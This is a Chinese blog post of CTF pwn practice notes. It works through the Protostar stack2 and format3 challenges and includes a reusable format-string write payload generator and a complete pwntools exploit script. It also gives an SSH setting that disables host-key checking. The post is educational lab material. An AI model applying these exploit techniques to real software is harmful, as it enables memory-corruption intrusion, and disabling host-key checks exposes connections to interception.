pwn 练习笔记 覆盖内存地址

最新推荐文章于 2024-04-23 21:17:56 发布
最新推荐文章于 2024-04-23 21:17:56 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: pwn 训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/81779664
版权
pwn 同时被 2 个专栏收录
20 篇文章 3 订阅
订阅专栏
训练
13 篇文章 0 订阅
订阅专栏

目录

 

覆盖内存地址

 protostar stack2

protostar format3

ssh copy文件报错

覆盖内存地址

根据ctfwiki学习

小于机器字长的数字,因为之前覆盖的方法把地址放在最前面,所以覆盖后,最小值也是4,如果是小于4的数字

可以把地址放在后面

覆盖大数字,构造通用函数如下:

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

payload = fmt_str(6(第几个参数),4(偏移),0x0804A028(覆盖的变量地址),0x12345678(需要覆盖的值))

ctfwiki讲的很细详细,有具体例子  详情见https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/

进入正题   做题啦   

 protostar stack2

源码为:

getenv(name)用来取得参数name环境变量的内容。参数name为环境变量的名称,如果该变量存在则会返回指向该内容的指针。环境变量的格式为name=value。执行成功则返回指向该内容的指针,找不到符合的环境变量名称则返回NULL。

所以要通过第一个if语句,就要为GREENIE这个环境变量设置一个值,variable就会返回GREENIE的值,而不是返回空值

然后我们要通过溢出buff 覆盖modified的值为0x0d0a0d0a,

要覆盖就要计算buff和modified的偏移,ida打开可以看见

buff 和 modified相对ebp的偏移量风别是0x48和0x8   所以 buff和modified之间的偏移为0x40(64)

构造payload  GREENIE = 'A'*64+0x0d0a0d0a    但是0x0a和0x0d是不可打印字符。所以使用decode函数,把十六进制转换为字符  就可以将omdified的值覆盖为0x0d0a0d0a

protostar format3

源码为:

可见函数printbuffer中存在格式化串漏洞,要覆盖target 的内容为0x01025544,

1.先找到target变量的地址

objdump -t ./fomat3 | grep target

找到target的地址为080496f4

2.计算偏移

可看出 string是print函数的第12 个参数,然后将ABCD改写为target的地址,就可以进行覆盖

3.脚本如下

from pwn import *

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr

def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

def main():
    sh = process('./format3')
    payload = fmt_str(12,4,0x080496f4,0x01025544)
    print payload
    sh.sendline(payload)
    print sh.recv()
    sh.interactive()

main()

ssh copy文件报错

使用scp命令时出现  ssh登录 The authenticity of host 192.168.0.xxx can't be established. 的问题
 

StrictHostKeyChecking no

UserKnownHostsFile /dev/null
 

SsMing.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-PWN练习之返回地址覆盖
ChuMeng1999的博客
01-05 787
目录预备知识一、相关实验二、函数调用约定三、基本的缓冲区溢出攻击模型实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》、《CTF-PWN练习之精确覆盖变量数据》、《CTF PWN练习之函数指针改写》等试验。 二、函数调用约定 函数调用约定描述了函数传递参数的方式和栈协同工作的技术细节,不同的函数调用约定原理基本相同,但在细节上是有差别的,包括函数参数的传递方式、参数的入栈顺序、函数返回时由谁来平
PWN基础3:内存保护概述 和 溢出实例
prettyX的博客
07-05 739
0x01 概述 1、操作系统提供了很多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险 (1)Stack Canary 栈溢出保护 是一种针对缓冲区溢出攻击的缓解手段。当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让Shellcode能够得到执行。当启用栈保护后,函数开始执行的时候,会先往栈里插入Cookie信息,当函数真正返回的时候会验证Cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的是否往往也会将Cookie信息给覆盖掉,导致栈保护检查失败而阻止Sh
内存覆盖
Tangbincheng的博客
04-11 379
//memmove()函数解决内存覆盖问题#include&lt;iostream&gt; #include&lt;assert.h&gt; using namespace std; void *memmove(void *dest, const void *source, size_t count) { assert((NULL != dest) &amp;&amp; (NULL != sour...
深入探索GDB:Linux下强大的调试神器
最新发布
专注于前后端学习
04-23 1618
GDB,全称GNU Debugger,是一款开源、跨平台的源码级调试工具,尤其在Linux生态系统中占据着举足轻重的地位。GDB支持包括C、C++、Fortran、Ada、Objective-C、Go、D等多种编程语言,能够与GCC、Clang、LLVM等一系列主流编译器无缝集成。无论是针对桌面应用程序、服务器端服务,还是嵌入式系统,GDB都能以其强大的功能和灵活的交互方式,为开发者提供无与伦比的调试体验。
PWN练习之精确覆盖变量数据
WateranFire的博客
09-05 1252
做合天上这一节时,有一个汇编上关于main函数参数的问题。 一般在进入函数后,首先执行push ebp;mov ebp,esp; 此时EBP指向的区域数据内容是这样的(从上到下由低位向高位) 原EBP        (EBP指向此处) 返回地址 argc argv   所以此后提到argc时,用[EBP+8]表示,提到argv
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 795
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
溢出覆盖返回地址实现攻击
九层台
08-26 2573
都知道call语句分2步 1.把返回地址放入堆栈 2.跳转到call的地址 如果这个返回地址被覆盖成我们想要执行的函数的地址结果是不是很有趣 O(∩_∩)O 思路很见到,找到我们需要的地址然后覆盖原来的返回地址就行了 下面就讲一些实现的细节 #include   void win() {     printf("Congratulations, you pwned
2018 10 14 pwn的学习0x5 没有缓冲区溢出,但是函数参数可覆盖
startr4ck
10-14 291
同样是一道pwn的入门题目,题目本身不同于覆盖返回地址进行控制程序流,而是通过控制紧紧挨着缓冲区附近的参数进行修改从而达到我们所想要程序的目的。 在这里发现我们使用的fgets进行输入,我们利用gdb进去看看 , 在这里发现箭头所指的位置是指的我们的下面的输出函数的内容所以我们要把这个内容所替换, 在程序当中发现有这么一段 把返回地址覆盖为他的地址就可以了   使用scanf函...
PWN中的gdb调试, pwndbg,peda,gef 切换使用的方法;
半岛铁盒的博客
04-09 4360
peda 用来做逆向破解是最方便的 gef 用来 debug 最好 pwndbg 做pwn题很方便 当你把三款调试工具装完之后,他们不能同时使用,并且他们的切换也不方便 三个插件的下载 Peda git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinit Gef wget -q -O- https://github.com/hugsy/gef/raw/mas
pwngdb+pwngef+peda三合一+pwngdb+pwndbg联合使用
qq_39153421的博客
04-01 4606
pwn调试工具安装 最近一直奇怪安装peda有些好用的工具突然用不了,比如fmtrag、heapinfo等命令,重新装了peda还是没有。经过一番查找,终于知道,pwngdb和pwndbg还不一样,有些是pwngdb的命令,有些事pwndbg的命令,所以找到一个他们几个联合使用的方法,记录一下。 下载pwngdb cd ~/ git clone https://github.com/scwuaptx/Pwngdb.git cp ~/Pwngdb/.gdbinit ~/ 它支持的命令如下: libc :
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4853
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
Linux pwn入门教程——格式化字符串漏洞
dfdhxb995397的博客
07-18 380
本文作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42943-1-1.html 0×00 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 然而,有时候为了省事也会写成 事实上,这是一种非常...
pwn 练习笔记 暑假十一天
SsMing的博客
07-23 424
题目来自:https://www.jarvisoj.com/challenges guestbook,一道特别简单的题 checksec查看:有个栈不可执行保护,没什么问题 IDA打开查看伪代码,先看main函数: 还看到调用了fopen和fgetc这样的函数,所以找了一下,发现good_game这个函数; 这个函数读取了flag.txt,这个函数的开始地址为000000...
pwn做题环境搭建
qq_36495104的博客
05-08 1284
pwn做题环境搭建 系统 Ubuntu16.04 x64 安装pip2 wget https://files.pythonhosted.org/packages/11/b6/abcb525026a4be042b486df43905d6893fb04f05aac21c32c638e939e447/pip-9.0.1.tar.gz tar -zxvf pip-9.0.1.tar.gz cd pip-9.0.1 python setup.py install #我这里只装了python2 如果上一步安装时提

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值